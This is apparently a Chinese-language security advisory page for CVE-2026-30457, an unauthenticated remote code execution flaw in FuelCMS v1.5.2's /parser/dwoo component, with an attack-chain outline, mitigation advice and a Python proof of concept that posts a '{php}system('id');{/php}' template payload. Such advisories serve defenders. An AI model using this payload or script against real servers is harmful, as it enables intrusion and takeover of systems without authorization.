IPBUF安全漏洞报告
English
CVE-2026-30457 CVSS 9.8 严重

CVE-2026-30457 FuelCMS远程代码执行漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-30457
漏洞类型
远程代码执行 (RCE)
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Daylight Studio FuelCMS

相关标签

RCEFuelCMS远程代码执行CVE-2026-30457Web安全PHP代码注入

漏洞概述

Daylight Studio FuelCMS v1.5.2版本中的/parser/dwoo组件存在严重的安全缺陷。该漏洞源于组件未能正确过滤用户提交的数据,允许攻击者通过网络向量注入并执行恶意的PHP代码。由于无需任何身份认证和用户交互,未经授权的攻击者可远程利用此漏洞,导致服务器被完全控制,存在极高的数据泄露和系统被破坏风险。

技术细节

该漏洞的核心在于FuelCMS使用的Dwoo模板引擎在处理特定解析请求时存在逻辑缺陷。攻击者可以利用/parser/dwoo接口,构造包含恶意PHP语法的HTTP POST请求。由于系统未对传入的模板数据进行严格的沙箱隔离或安全转义,攻击者可以通过Dwoo的特定标签或PHP原生代码注入功能绕过防御机制。一旦恶意载荷被服务器端接收并解析,Web服务器将以当前运行权限执行该代码。这通常导致攻击者获取Webshell,能够读取敏感文件、安装后门或进一步横向移动,对服务器机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1
侦察
攻击者使用网络扫描工具识别目标服务器是否运行Daylight Studio FuelCMS v1.5.2,并定位/parser/dwoo接口。
STEP 2
漏洞利用
攻击者向/parser/dwoo接口发送特制的HTTP POST请求,其中包含经过精心构造的恶意PHP代码载荷。
STEP 3
代码执行
服务器端Dwoo组件解析恶意载荷,由于缺乏安全过滤,直接执行了攻击者注入的PHP系统命令。
STEP 4
权限维持与扩展
攻击者利用执行的命令写入Webshell或后门程序,获取服务器持久控制权限,并可能进一步内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual target) target_url = "http://example.com/parser/dwoo" # Malicious PHP code payload intended for the vulnerable Dwoo component # This payload attempts to execute the 'id' command on the server payload = "{php}system('id');{/php}" # Data to be sent in the request data = { "code": payload, "test": "1" } try: print("[*] Sending payload to target...") response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

影响范围

Daylight Studio FuelCMS v1.5.2

防御指南

临时缓解措施
如果无法立即升级,建议在Web应用防火墙(WAF)中添加规则,拦截针对/parser/dwoo路径的包含PHP标签或系统命令关键字的请求。同时,检查服务器日志中是否存在异常的代码执行记录,以确认是否已被入侵。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表